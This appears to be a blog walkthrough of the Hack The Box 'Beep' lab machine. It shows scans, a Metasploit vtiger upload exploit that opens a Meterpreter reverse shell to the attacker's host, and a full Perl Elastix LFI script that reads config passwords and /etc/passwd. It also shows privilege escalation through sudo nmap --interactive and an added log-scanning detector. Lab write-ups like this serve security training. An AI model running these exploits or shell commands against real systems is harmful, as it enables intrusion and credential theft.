 2020-04-07   2.5k

HTB::Beep Walkthrough

0x01 Info Card

0x02 Tools and Tips

  • nmap
  • sslscan
  • wfuzz
  • vtigercrm
  • LFI
  • Elastix / FreePBX
  • Nmap Privilege Escalation

0x03 Pentesting

Initial Enumeration

Port scan

# Nmap 7.80 scan initiated Tue Apr  7 03:18:33 2020 as: nmap -sC -sV -Pn -oN ippsec_scan.txt 10.10.10.7
Nmap scan report for 10.10.10.7
Host is up (0.25s latency).
Not shown: 987 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp open http Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: TOP APOP UIDL IMPLEMENTATION(Cyrus POP3 server v2) LOGIN-DELAY(0) STLS RESP-CODES AUTH-RESP-CODE USER EXPIRE(NEVER) PIPELINING
111/tcp open rpcbind 2 (RPC #100000)
143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: THREAD=REFERENCES ATOMIC Completed MAILBOX-REFERRALS OK RENAME LISTEXT LITERAL+ MULTIAPPEND X-NETSCAPE LIST-SUBSCRIBED CHILDREN UNSELECT RIGHTS=kxte URLAUTHA0001 IDLE IMAP4rev1 SORT=MODSEQ ID BINARY IMAP4 CONDSTORE CATENATE SORT ANNOTATEMORE NO UIDPLUS STARTTLS ACL NAMESPACE THREAD=ORDEREDSUBJECT QUOTA
443/tcp open ssl/https?
|_ssl-date: 2020-04-07T07:23:36+00:00; +1m25s from scanner time.
880/tcp open status 1 (RPC #100024)
993/tcp open ssl/imap Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp open pop3 Cyrus pop3d
3306/tcp open mysql MySQL (unauthorized)
4445/tcp open upnotifyp?
10000/tcp open http MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com

Host script results:
|_clock-skew: 1m24s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Apr 7 03:24:47 2020 -- 1 IP address (1 host up) scanned in 374.24 seconds

SSL scan

# kali @ kali in ~/HackTheBox/Beep [4:37:19] C:127
$ sslscan 10.10.10.7
Version: 2.0.0-static
OpenSSL 1.1.1f-dev xx XXX xxxx

Connected to 10.10.10.7
Testing SSL server 10.10.10.7 on port 443 using SNI name 10.10.10.7

SSL/TLS Protocols:
SSLv2 disabled
SSLv3 enabled
TLSv1.0 enabled
TLSv1.1 disabled
TLSv1.2 disabled
TLSv1.3 disabled

TLS Fallback SCSV:
Server does not support TLS Fallback SCSV

TLS renegotiation:
Secure session renegotiation supported

TLS Compression:
Compression enabled (CRIME)

Heartbleed:
TLSv1.0 not vulnerable to heartbleed

Supported Server Cipher(s):
Preferred TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
Accepted TLSv1.0 112 bits DHE-RSA-DES-CBC3-SHA DHE 1024 bits
Accepted TLSv1.0 256 bits AES256-SHA
Accepted TLSv1.0 128 bits AES128-SHA
Accepted TLSv1.0 128 bits RC4-SHA

Accepted TLSv1.0 112 bits DES-CBC3-SHA
Accepted TLSv1.0 56 bits TLS_RSA_WITH_DES_CBC_SHA
Accepted TLSv1.0 56 bits TLS_DHE_RSA_WITH_DES_CBC_SHA

Server Signature Algorithm(s):
TLSv1.0 Server accepts all signature algorithms.

SSL Certificate:
Signature Algorithm: sha1WithRSAEncryption
RSA Key Strength: 1024

Subject: localhost.localdomain
Issuer: localhost.localdomain

Not valid before: Apr 7 08:22:08 2017 GMT
Not valid after: Apr 7 08:22:08 2018 GMT

Directory scan with wfuzz

Getting User Access

Looking for vulnerabilities in vtigercrm v5.1.0

Tried `vtiger_php_exec` first; when that did not work, switched to `vtiger_soap_upload`, which gives a reverse shell.

msf5 exploit(multi/http/vtiger_php_exec) > use exploit/multi/http/vtiger_soap_upload
msf5 exploit(multi/http/vtiger_soap_upload) > show options

Module options (exploit/multi/http/vtiger_soap_upload):

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /vtigercrm/ yes Base vTiger CRM directory path
VHOST no HTTP server virtual host


Exploit target:

Id Name
-- ----
0 vTigerCRM v5.4.0


msf5 exploit(multi/http/vtiger_soap_upload) > set RHOSTS 10.10.10.7
RHOSTS => 10.10.10.7
msf5 exploit(multi/http/vtiger_soap_upload) > set RPORT 443
RPORT => 443
msf5 exploit(multi/http/vtiger_soap_upload) > set SSL true
SSL => true
msf5 exploit(multi/http/vtiger_soap_upload) > set LHOST 10.10.14.5
LHOST => 10.10.14.5

msf5 exploit(multi/http/vtiger_soap_upload) > check
[+] 10.10.10.7:443 - The target is vulnerable.
msf5 exploit(multi/http/vtiger_soap_upload) > exploit

[*] Started reverse TCP handler on 10.10.14.5:4444
[*] Uploading payload...
[+] Upload successfully uploaded
[*] Executing payload...
[*] Sending stage (38288 bytes) to 10.10.10.7
[*] Meterpreter session 1 opened (10.10.14.5:4444 -> 10.10.10.7:43989) at 2020-04-07 10:50:50 -0400
[!] This exploit may require manual cleanup of 'bPRojImibS.php' on the target

meterpreter >
[+] Deleted bPRojImibS.php
shell
Process 8916 created.
Channel 0 created.
id
uid=100(asterisk) gid=101(asterisk) groups=101(asterisk)

Getting the user flag

python -c "import pty;pty.spawn('/bin/sh')"   
sh-3.2$ id
id
uid=100(asterisk) gid=101(asterisk) groups=101(asterisk)
sh-3.2$ pwd
pwd
/var/www/html/vtigercrm
sh-3.2$ cd /home/fanis
cd /home/fanis
sh-3.2$ ls -la
ls -la
total 32
drwxrwxr-x 2 fanis fanis 4096 Apr 7 2017 .
drwxr-xr-x 4 root root 4096 Apr 7 2017 ..
-rw------- 1 fanis fanis 114 Apr 7 2017 .bash_history
-rw-r--r-- 1 fanis fanis 33 Apr 7 2017 .bash_logout
-rw-r--r-- 1 fanis fanis 176 Apr 7 2017 .bash_profile
-rw-r--r-- 1 fanis fanis 124 Apr 7 2017 .bashrc
-rw-rw-r-- 1 fanis fanis 33 Apr 7 2017 user.txt
sh-3.2$ cat user.txt
cat user.txt
aeff3def0c765c2677b94715cffa73ac

Getting Root Access

Privilege escalation

sh-3.2$ sudo -l
sudo -l
Matching Defaults entries for asterisk on this host:
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
XAUTHORITY"

User asterisk may run the following commands on this host:
(root) NOPASSWD: /sbin/shutdown
(root) NOPASSWD: /usr/bin/nmap
(root) NOPASSWD: /usr/bin/yum
(root) NOPASSWD: /bin/touch
(root) NOPASSWD: /bin/chmod
(root) NOPASSWD: /bin/chown
(root) NOPASSWD: /sbin/service
(root) NOPASSWD: /sbin/init
(root) NOPASSWD: /usr/sbin/postmap
(root) NOPASSWD: /usr/sbin/postfix
(root) NOPASSWD: /usr/sbin/saslpasswd2
(root) NOPASSWD: /usr/sbin/hardware_detector
(root) NOPASSWD: /sbin/chkconfig
(root) NOPASSWD: /usr/sbin/elastix-helper

Nmap is the hit: it can be run as root without any authentication.

Older versions of Nmap (2.02 through 5.21) have an interactive mode that lets the user run shell commands. Since Nmap is on the list of binaries that may be executed with root privileges, its interactive console can be used to start a shell with those same privileges.

sh-3.2$ sudo nmap --interactive
sudo nmap --interactive

Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
sh-3.2# whoami
whoami
root
sh-3.2# cat /root/root.txt
cat /root/root.txt
d88e006123842106982acce0aaf453f0

Another Way

Focus on a few common services: 22 (ssh), 80 (apache), 443 (https), 3306 (mysql) and 10000 (httpd). Visiting https://10.10.10.7:443 returns a login page:

Tried the default credentials (username: admin, password: palosanto); the login failed.

Search for related vulnerabilities with searchsploit:

Try the local file inclusion vulnerability. Because the SSL certificate on the target machine has expired, the exploit script needs a small modification:

https://stackoverflow.com/questions/336575/can-i-force-lwpuseragent-to-accept-an-expired-ssl-certificate

#!/usr/bin/perl -w
#------------------------------------------------------------------------------------
# Elastix is an Open Source Software to establish Unified Communications.
# About this concept, Elastix goal is to incorporate all the communication alternatives,
# available at an enterprise level, into a unique solution.
#------------------------------------------------------------------------------------
###########################################################
# Exploit Title: Elastix 2.2.0 LFI
# Google Dork: :(
# Author: cheki
# Version:Elastix 2.2.0
# Tested on: multiple
# CVE : notyet
# romanc-_-eyes ;)
# Discovered by romanc-_-eyes
# vendor http://www.elastix.org/

print "\t Elastix 2.2.0 LFI Exploit \n";
print "\t code author cheki \n";
print "\t 0day Elastix 2.2.0 \n";
print "\t email: anonymous17hacker{}gmail.com \n";

#LFI Exploit: /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

use LWP::UserAgent;
use HTTP::Request;
print "\n Target: https://ip ";
chomp(my $target=<STDIN>);
$dir="vtigercrm";
$poc="current_language";
$etc="etc";
$jump="../../../../../../../..//";
$test="amportal.conf%00";
$code = LWP::UserAgent->new() or die "inicializacia brauzeris\n";
# Added for this box: the target's certificate is expired, so skip hostname and
# certificate verification (see the StackOverflow link above).
$code->ssl_opts(verify_hostname => 0, SSL_verify_mode => 0x00);
$code->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/".$dir."/graph.php?".$poc."=".$jump."".$etc."/".$test."&module=Accounts&action";
$res = $code->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
# amportal.conf carries a FreePBX header; its presence means the include worked.
if ($answer =~ 'This file is part of FreePBX') {
    print "\n read amportal.conf file : $answer \n\n";
    print " successful read\n";
}
else {
    print "\n[-] not successful\n";
}

From the earlier sslscan output we saw that the target only supports TLSv1.0, so we also need to modify Kali's openssl configuration file:

[system_default_sect]
#MinProtocol = TLSv1.2
#CipherString = DEFAULT@SECLEVEL=2

MinProtocol = TLSv1.0
CipherString = DEFAULT

Then run the exploit script again:

# kali @ kali in ~/HackTheBox/Beep [5:15:57]
$ perl 37637.pl > elastix
# kali @ kali in ~/HackTheBox/Beep [5:16:34]
$ cat elastix
...
AMPDBHOST=localhost
AMPDBENGINE=mysql
# AMPDBNAME=asterisk
AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
#AMPMGRPASS=amp111
AMPMGRPASS=jEhdIekWmdjE
...

Using the same payload, /etc/passwd can be read directly in the browser:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
distcache:x:94:94:Distcache:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
dbus:x:81:81:System message bus:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
spamfilter:x:500:500::/home/spamfilter:/bin/bash
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
fanis:x:501:501::/home/fanis:/bin/bash
Sorry! Attempt to access restricted file.
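On the defensive side, the graph.php requests used above leave a distinctive trace in the Apache access log: a `current_language` value containing `../` and an encoded NUL byte. The following is an added example (not from the original walkthrough) that scans access-log lines for traversal and NUL-byte indicators in any query parameter, decoding repeatedly so double-encoded variants are caught as well. The log lines are constructed samples modelled on this box.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Constructed sample access-log lines (Apache combined format). The first two have
# the shape of the graph.php traversal shown above; the last two are benign.
LOG_LINES = [
    '10.10.14.5 - - [07/Apr/2020:05:16:34 +0000] "GET /vtigercrm/graph.php?current_language='
    '../../../../../../../..//etc/amportal.conf%00&module=Accounts&action HTTP/1.1" 200 5120 "-" "-"',
    '10.10.14.5 - - [07/Apr/2020:05:20:01 +0000] "GET /vtigercrm/graph.php?current_language='
    '..%252f..%252f..%252fetc%252fpasswd%00&module=Accounts&action HTTP/1.1" 200 2048 "-" "curl/7.68.0"',
    '10.10.14.9 - - [07/Apr/2020:05:21:10 +0000] "GET /vtigercrm/graph.php?current_language=en_us'
    '&module=Accounts&action=index HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '10.10.14.9 - - [07/Apr/2020:05:22:00 +0000] "GET /index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded traversal (%252e) is still caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def lfi_indicators(target):
    """Names of query parameters whose decoded value carries '../' or a NUL byte."""
    hits = []
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        val = decode_fully(raw)          # parse_qsl decoded once already; go deeper
        if "../" in val or "..\\" in val or "\x00" in val:
            hits.append(name)
    return hits


def scan(lines):
    """Return (client ip, timestamp, status, path, offending params) per suspicious request."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        params = lfi_indicators(m.group("target"))
        if params:
            findings.append((m.group("ip"), m.group("ts"), int(m.group("status")),
                             urlsplit(m.group("target")).path, params))
    return findings
```

A 200 status on a flagged request (rather than the application's "Attempt to access restricted file" response) is the case worth escalating, since it indicates the include likely succeeded.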

Logging in to the target as fanis : jEhdIekWmdjE gave a wrong password; after another look at a writeup, it turns out you can simply log in as root directly... orz ==

# kali @ kali in ~/HackTheBox/Beep [9:19:31]
$ ssh root@10.10.10.7
root@10.10.10.7's password:
Last login: Tue Apr 7 16:20:42 2020 from 10.10.14.5

Welcome to Elastix
----------------------------------------------------

To access your Elastix System, using a separate workstation (PC/MAC/Linux)
Open the Internet Browser using the following URL:
http://10.10.10.7

[root@beep ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@beep ~]# cat /root/root.txt
d88e006123842106982acce0aaf453f0
[root@beep ~]# cat /home/fanis/user.txt
aeff3def0c765c2677b94715cffa73ac
Copyright © ca01h 2019-2020